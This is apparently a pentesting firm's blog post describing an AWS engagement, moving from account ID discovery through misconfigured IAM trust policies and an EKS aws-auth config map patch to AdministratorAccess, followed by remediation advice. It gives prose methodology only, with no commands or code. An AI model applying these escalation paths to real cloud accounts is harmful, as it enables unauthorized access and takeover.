Pentesting AWS Cloud: From AWS Account ID Discovery to EKS Cluster Admin and Beyond

A cloud red team is not important but critical for any organization with a cloud footprint. What started as a simple AWS account enumeration, ended up with the Syn Cubes team found the path to the AWS EKS Cluster admin role. But there is even more...

Syn Cubes Community - January 18, 2024
Pentesting AWS Cloud: From AWS Account ID Discovery to EKS Cluster Admin and Beyond


Each AWS account has a unique 12-digit identifier like a fingerprint. This ID lets someone recognize his account across AWS services and is embedded within Amazon Resource Names (ARNs). AWS randomly assigns these IDs, ensuring no duplicates - like a special password for the user's cloud world. Then here comes the Identity and Access Management service that behaves like an extension of the user's ID identifier. Think of IAM as a security gatekeeper, managing who can access your AWS resources, how they access them, and what they can do once inside.

IAM works through roles and users, assigned specific permissions within Identity and Access Management policies. These policies act like rules, granting access to specific AWS resources for certain users or roles.

AWS account ID is a sensitive information. An attacker can, and it will try to discover valid AWS account identifiers through brute-forcing or through open-source intelligence techniques. The brute force technique involves adding or subtracting numbers from a known or assumed account identifier. Then, the attacker checks the ID variations against an AWS harmful permission policy.

Following the same strategy combined with results gathered from OSINT queries, the team was able to discover and confirm a client's AWS account ID and its associated role within its assigned policy.

IAM Role "hijacked" by any user with an AWS Account

After some checks, the team noted that the AWS Role assigned to AWS ID found previously has a misconfigured trust relationship policy that allows any identities from any AWS account on the internet to assume it. To be more exact, the affected role in question provided multiple permissions to list and read IAM resources from the affected AWS account.

To summarize:

  • An adversary that will follow the same steps will be in the position of "assuming" it from their own AWS account. This will give them an initial foothold inside the AWS environment and allow them to read and list Identity and Access Management resources that might expose other misconfigurations that can be further abused in order to compromise the AWS environment. Another side effect will be that the attacker can find from the trust relationship of various roles other AWS account in the client's ownership.
  • The attacker would be able to expand their scope within the targeted organization AWS footprint. What's next?

Capture the Flag #1: Privilege Escalation to Cluster Admin

With the initial foothold established, the Syn Cubes team noticed that the client is running an Amazon EKS cluster.

The first step here was probing the EKS cluster for security misconfigurations. As a result of this action and reading the initial results, the team managed to escalate privileges to cluster admin by moving laterally to a Service Account that had the "patch" permission over the "aws-auth" config map, via a less known attack vector. Even if this cluster role in Amazon EKS is heavily limited, this vulnerability will allow a malicious user to impersonate any Service Account from the pods running on the same worker node, no matter the namespace.

In EKS, the permission to patch config maps can lead to privilege escalation by modifying the "aws-auth" config map. This config map contains mappings between AWS IAM identities and Kubernetes identities.

Capture the Flag #2: Privilege escalation from pod to AWS Administrator

During the EKS configuration review, it was also noticed that an adversary would be in the position to elevate his current privileges and obtain the Administrator permissions at the targeted organization's AWS account level.

When checking the configuration of a pod, we can name for the sake of simplicity "echo-*", it was found that inside the environmental variables there are references to an AWS IAM role that was configured to obtain AWS permission by assuming this role via the AWS Web Identity feature.

By reading the contents of the file "/var/run/secrets/" present inside the "echo-*" pod, anyone can assume the "echo-role" using the AWS CLI. It tuned out that this role allowed the action "sts:AssumeRole" over every other role. This is a dangerous permission that can be used in assuming a role with higher or different permissions than the initial ones.

Executing a role enumeration, we ended up by initially finding a role that had attached to it the AWS managed policy "AdministratorAccess" that granted the highest level of access in an AWS account. We checked the Trust Relationship related to this role within the Amazon Elastic Kubernetes Service cluster and was a perfect candidate for the next step until capturing this flag, however, it required an External ID. External IDs are a good security practice for mitigating the Confused Deputy attack.

After a while, another role was found that was used to find the External ID by anyone from the internet with a valid AWS account. This role had a Trust Relationship security misconfiguration in the AWS EKS that allowed hijacking the External ID. On top of that, the role had several other IAM permissions to list and read Identity and Access Management resources. At this point, the second flag was captured in the penetration test of the Amazon Kubernetes cluster.


While we decided to keep private the attack vectors the complete details in order to prevent threat actors to reporduce them and attack other organizations, this exercise demonstrated how a potential adversary can take advantage of several misconfigurations that often can be overlooked by the cloud engineers when they are dealing with vast and complex cloud architecture patterns.

There are multiple recommendations that should be put in place to fix or mitigate most of the above to happen:

  • Remove the action "sts:AssumeRole" or restrict it to only those roles that should be assumed by the pod. The trust relationship should be modified so that the role can be assumed only by specific pods. In a k8s cluster's security group, this can be done by enforcing a specific IP source or VPC network source. However, please note that if the attacker can execute code inside the pod of the cluster, then this security group mitigation will be bypassed.
  • Change the given permissions so that they will follow the least privilege principle in the Amazon Elastic Kubernetes Service cluster. Using the AWS managed policy "AdminsitratorAccess" is against security best practices because it can grant attackers or malicious users full control over the AWS account.
  • Change the Trust Relationship policy so that it will allow only the Identity and Access Management identities that should indeed assume this role.
  • Reconfigure the trust relationship for the Elastic Kubernetes Service cluster so that it will not allow any AWS account on the internet to assume it.
  • Prevent the pods accessing the Metadata API. This can be done by setting the number of allowed hops of the Metadata API's response to 1 during the EKS configuration.
  • Do not deploy on the same worker node pods with service accounts with high privileges and pods with common services like web applications, databases and so on.
  • Analyze the need and limit the permission to edit/update/patch the "aws-auth" config map only to those Service Accounts that need it.
  • Implement Instance Metadata Service version 2 across the board.
  • Use Service Control Policies to control the level of access for different users in the Amazon k8s cluster.

Acknowledgements | References | Resources

Be the adversary - attack first